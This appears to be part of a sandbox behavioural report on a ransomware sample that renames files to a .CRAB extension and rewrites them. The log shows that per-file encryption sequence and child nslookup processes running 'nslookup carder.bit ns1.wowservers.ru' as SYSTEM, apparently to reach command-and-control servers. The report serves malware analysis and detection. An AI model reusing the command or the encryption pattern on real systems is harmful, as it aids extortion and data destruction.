File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_DriverPackageInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_DriverPackageInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_DriverPackageInfo.CRAB, size = 56384 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_DriverPackageInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_DriverPackageInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_WindowsUpdateInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_WindowsUpdateInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 264 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_WindowsUpdateInfo.CRAB, size = 272 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_WindowsUpdateInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_WindowsUpdateInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_DriverPackageInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_DriverPackageInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_DriverPackageInfo.CRAB, size = 56384 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_DriverPackageInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_DriverPackageInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_WindowsUpdateInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_WindowsUpdateInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 432 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_WindowsUpdateInfo.CRAB, size = 432 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_WindowsUpdateInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_WindowsUpdateInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_DriverPackageInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_DriverPackageInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_DriverPackageInfo.CRAB, size = 56384 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_DriverPackageInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_DriverPackageInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_WindowsUpdateInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_WindowsUpdateInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 376 True 1
Fn
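For performance reasons, the remaining 5404 entries are omitted from this view; they can be found in glog.xml.
The entries shown above repeat one sequence per file: the file is renamed with a .CRAB extension, CryptGenRandom is resolved twice in advapi32.dll, the renamed file is opened and read, and it then receives a write of the read size rounded up to a multiple of 16 bytes, two 256-byte writes and one 8-byte write. This per-file rename, read and write sequence across many files is the behavioural pattern to look for in this log.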
Process #10: nslookup.exe
10 18
Information Value
ID #10
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup carder.bit ns1.wowservers.ru
Initial Working Directory C:\Users\5P5NRG~1\AppData\Local\Temp\
Monitor Start Time: 00:00:59, Reason: Child Process
Unmonitor End Time: 00:02:24, Reason: Terminated by Timeout
Monitor Duration 00:01:25
OS Process Information
Information Value
PID 0xb44
Parent PID 0xad4 (c:\users\5p5nrg~1\appdata\local\temp\b32.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0xB48
0xB5C
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable, Writable True False False -
nslookup.exe.mui 0x000f0000 0x000f4fff Memory Mapped File Readable, Writable False False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x0000000000110000 0x00110000 0x00110fff Private Memory Readable, Writable True False False -
nslookup.exe 0x00140000 0x0015dfff Memory Mapped File Readable, Writable, Executable True False False -
private_0x0000000000160000 0x00160000 0x001cffff Private Memory Readable, Writable True False False -
private_0x0000000000210000 0x00210000 0x0021ffff Private Memory Readable, Writable True False False -
private_0x0000000000240000 0x00240000 0x0027ffff Private Memory Readable, Writable True False False -
private_0x0000000000280000 0x00280000 0x002bffff Private Memory Readable, Writable True False False -
private_0x0000000000370000 0x00370000 0x003effff Private Memory Readable, Writable True False False -
private_0x00000000003f0000 0x003f0000 0x0042ffff Private Memory Readable, Writable True False False -
private_0x00000000004a0000 0x004a0000 0x0059ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000005a0000 0x005a0000 0x00727fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000730000 0x00730000 0x008b0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000008c0000 0x008c0000 0x01cbffff Pagefile Backed Memory Readable True False False -
private_0x0000000001d00000 0x01d00000 0x01d3ffff Private Memory Readable, Writable True False False -
private_0x0000000001db0000 0x01db0000 0x01deffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x01df0000 0x020befff Memory Mapped File Readable False False False -
private_0x00000000020c0000 0x020c0000 0x021cffff Private Memory Readable, Writable True False False -
private_0x00000000020c0000 0x020c0000 0x021bffff Private Memory Readable, Writable True False False -
private_0x00000000021c0000 0x021c0000 0x021cffff Private Memory Readable, Writable True False False -
private_0x00000000021d0000 0x021d0000 0x022effff Private Memory Readable, Writable True False False -
wsock32.dll 0x70fa0000 0x70fa6fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x74db0000 0x74de7fff Memory Mapped File Readable, Writable, Executable False False False -
wship6.dll 0x74df0000 0x74df5fff Memory Mapped File Readable, Writable, Executable False False False -
wshtcpip.dll 0x74e00000 0x74e04fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x74e10000 0x74e17fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x74e20000 0x74e5bfff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x74e60000 0x74e71fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x74e80000 0x74e8ffff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x74ed0000 0x74ed5fff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x74ee0000 0x74eeffff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x75040000 0x75046fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x75050000 0x7506bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x75070000 0x750b3fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x75360000 0x75367fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x75370000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x753d0000 0x7540efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75980000 0x7598bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75990000 0x759effff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75a30000 0x75a48fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x75a50000 0x75a55fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75bb0000 0x75bf5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fd0000 0x760dffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x760e0000 0x7617ffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x76380000 0x763b4fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x763c0000 0x763c9fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x763e0000 0x764dffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76670000 0x7671bfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76720000 0x767ebfff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x77570000 0x775cffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x775d0000 0x776bffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x77820000 0x778affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x77990000 0x77a2cfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000077a30000 0x77a30000 0x77b4efff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077b50000 0x77b50000 0x77c49fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77c50000 0x77df8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77e30000 0x77faffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0xb48
10 18
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-05-11 13:20:56 (UTC) True 1
Fn
System Get Time type = Ticks, time = 119371 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\nslookup.exe, base_address = 0x140000 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList False 1
Fn
DNS Get Hostname name_out = XDuwTfOno True 1
Fn
DNS Resolve Name host = ns1.wowservers.ru, address_out = 94.249.60.127, 89.203.10.56, 189.75.183.21 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 94.249.60.127, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 44, size_out = 44 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 94.249.60.127, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 188 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 94.249.60.127, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 570 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Process #11: nslookup.exe
10 18
Information Value
ID #11
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup carder.bit ns1.wowservers.ru
Initial Working Directory C:\Users\5P5NRG~1\AppData\Local\Temp\
Monitor Start Time: 00:01:37, Reason: Child Process
Unmonitor End Time: 00:02:24, Reason: Terminated by Timeout
Monitor Duration 00:00:47
OS Process Information
Information Value
PID 0x770
Parent PID 0xad4 (c:\users\5p5nrg~1\appdata\local\temp\b32.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 690
0x 8C0
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000070000 0x00070000 0x00071fff Pagefile Backed Memory Readable, Writable True False False -
nslookup.exe.mui 0x00080000 0x00084fff Memory Mapped File Readable, Writable False False False -
private_0x0000000000090000 0x00090000 0x00090fff Private Memory Readable, Writable True False False -
private_0x00000000000a0000 0x000a0000 0x000a0fff Private Memory Readable, Writable True False False -
private_0x00000000000b0000 0x000b0000 0x000effff Private Memory Readable, Writable True False False -
locale.nls 0x000f0000 0x00156fff Memory Mapped File Readable False False False -
private_0x0000000000160000 0x00160000 0x001cffff Private Memory Readable, Writable True False False -
private_0x00000000001f0000 0x001f0000 0x0022ffff Private Memory Readable, Writable True False False -
private_0x00000000002a0000 0x002a0000 0x002dffff Private Memory Readable, Writable True False False -
private_0x0000000000300000 0x00300000 0x0033ffff Private Memory Readable, Writable True False False -
private_0x0000000000360000 0x00360000 0x003dffff Private Memory Readable, Writable True False False -
private_0x00000000003e0000 0x003e0000 0x004dffff Private Memory Readable, Writable True False False -
nslookup.exe 0x004f0000 0x0050dfff Memory Mapped File Readable, Writable, Executable True False False -
private_0x0000000000640000 0x00640000 0x0073ffff Private Memory Readable, Writable True False False -
private_0x00000000008c0000 0x008c0000 0x008cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000008d0000 0x008d0000 0x00a57fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000a60000 0x00a60000 0x00be0fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000bf0000 0x00bf0000 0x01feffff Pagefile Backed Memory Readable True False False -
private_0x0000000001ff0000 0x01ff0000 0x0219ffff Private Memory Readable, Writable True False False -
private_0x0000000001ff0000 0x01ff0000 0x0217ffff Private Memory Readable, Writable True False False -
private_0x0000000002190000 0x02190000 0x0219ffff Private Memory Readable, Writable True False False -
private_0x00000000021a0000 0x021a0000 0x021dffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x021e0000 0x024aefff Memory Mapped File Readable False False False -
fwpuclnt.dll 0x74db0000 0x74de7fff Memory Mapped File Readable, Writable, Executable False False False -
wship6.dll 0x74df0000 0x74df5fff Memory Mapped File Readable, Writable, Executable False False False -
wshtcpip.dll 0x74e00000 0x74e04fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x74e10000 0x74e17fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x74e20000 0x74e5bfff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x74e60000 0x74e71fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x74e80000 0x74e8ffff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x74ed0000 0x74ed5fff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x74ee0000 0x74eeffff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x75040000 0x75046fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x75050000 0x7506bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x75070000 0x750b3fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x75360000 0x75367fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x75370000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x753d0000 0x7540efff Memory Mapped File Readable, Writable, Executable False False False -
wsock32.dll 0x75860000 0x75866fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75980000 0x7598bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75990000 0x759effff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75a30000 0x75a48fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x75a50000 0x75a55fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75bb0000 0x75bf5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fd0000 0x760dffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x760e0000 0x7617ffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x76380000 0x763b4fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x763c0000 0x763c9fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x763e0000 0x764dffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76670000 0x7671bfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76720000 0x767ebfff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x77570000 0x775cffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x775d0000 0x776bffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x77820000 0x778affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x77990000 0x77a2cfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000077a30000 0x77a30000 0x77b4efff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077b50000 0x77b50000 0x77c49fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77c50000 0x77df8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77e30000 0x77faffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
